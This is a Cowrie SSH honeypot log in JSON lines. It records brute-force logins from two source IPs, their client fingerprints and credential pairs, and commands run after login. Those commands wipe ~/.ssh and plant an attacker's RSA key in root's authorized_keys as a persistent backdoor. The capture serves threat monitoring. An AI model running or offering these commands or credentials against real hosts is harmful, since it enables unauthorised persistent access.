{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:52:15.734463Z","src_ip":"212.227.235.229","session":"81dccf4cca3d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:52:16.490428Z","src_ip":"212.227.235.229","session":"81dccf4cca3d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:16.666403Z","src_ip":"212.227.235.229","session":"2f77f988cb91"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:16.676604Z","src_ip":"212.227.235.229","session":"81dccf4cca3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41284,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f641b44b80e","protocol":"ssh","message":"New connection: 212.227.235.229:41284 (1.2.3.4:22) [session: 7f641b44b80e]","sensor":"my-vps","timestamp":"2025-09-09T05:52:19.058309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:52:19.059316Z","src_ip":"212.227.235.229","session":"7f641b44b80e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:52:19.140483Z","src_ip":"212.227.235.229","session":"7f641b44b80e"}
{"eventid":"cowrie.login.failed","username":"user","password":"Password","message":"login attempt [user/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T05:52:19.505857Z","src_ip":"212.227.235.229","session":"7f641b44b80e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":53571,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1f6a755210e","protocol":"ssh","message":"New connection: 213.6.203.226:53571 (1.2.3.4:22) [session: c1f6a755210e]","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.219674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.221087Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.299731Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.588145Z","src_ip":"212.227.235.229","session":"7f641b44b80e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qweasd2024","message":"login attempt [root/Qweasd2024] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.634448Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:52:20.839518Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.840235Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.841444Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:20.915666Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:52:21.088600Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.089290Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.169631Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.170521Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":49319,"dst_ip":"1.2.3.4","dst_port":22,"session":"3693dd160f91","protocol":"ssh","message":"New connection: 213.6.203.226:49319 (1.2.3.4:22) [session: 3693dd160f91]","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.241052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.242450Z","src_ip":"213.6.203.226","session":"3693dd160f91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.310767Z","src_ip":"213.6.203.226","session":"3693dd160f91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:52:21.623775Z","src_ip":"213.6.203.226","session":"3693dd160f91"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:22.695012Z","src_ip":"213.6.203.226","session":"3693dd160f91"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":34900,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf1fad9ea26","protocol":"ssh","message":"New connection: 213.6.203.226:34900 (1.2.3.4:22) [session: 6cf1fad9ea26]","sensor":"my-vps","timestamp":"2025-09-09T05:52:22.761867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:52:22.762549Z","src_ip":"213.6.203.226","session":"6cf1fad9ea26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:52:22.830726Z","src_ip":"213.6.203.226","session":"6cf1fad9ea26"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:52:23.141332Z","src_ip":"213.6.203.226","session":"6cf1fad9ea26"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:23.210339Z","src_ip":"213.6.203.226","session":"6cf1fad9ea26"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:23.215479Z","src_ip":"213.6.203.226","session":"c1f6a755210e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41324,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa7250ea18f","protocol":"ssh","message":"New connection: 212.227.235.229:41324 (1.2.3.4:22) [session: 4aa7250ea18f]","sensor":"my-vps","timestamp":"2025-09-09T05:52:46.714904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:52:46.716488Z","src_ip":"212.227.235.229","session":"4aa7250ea18f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:52:46.889700Z","src_ip":"212.227.235.229","session":"4aa7250ea18f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:52:47.711915Z","src_ip":"212.227.235.229","session":"4aa7250ea18f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:52:48.887320Z","src_ip":"212.227.235.229","session":"4aa7250ea18f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:02.567443Z","src_ip":"212.227.235.229","session":"9ac7d81a9ffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51400,"dst_ip":"1.2.3.4","dst_port":22,"session":"48ba7e8a94f0","protocol":"ssh","message":"New connection: 212.227.235.229:51400 (1.2.3.4:22) [session: 48ba7e8a94f0]","sensor":"my-vps","timestamp":"2025-09-09T05:53:10.786156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:53:10.787339Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:53:11.029206Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf!234","message":"login attempt [root/asdf!234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:53:12.037014Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:53:12.574196Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:53:12.574887Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:53:12.576555Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.060522Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:53:13.353306Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.353955Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.597951Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.598810Z","src_ip":"212.227.235.229","session":"48ba7e8a94f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52392,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee3c4a2e124c","protocol":"ssh","message":"New connection: 212.227.235.229:52392 (1.2.3.4:22) [session: ee3c4a2e124c]","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.839316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:53:13.840100Z","src_ip":"212.227.235.229","session":"ee3c4a2e124c"}
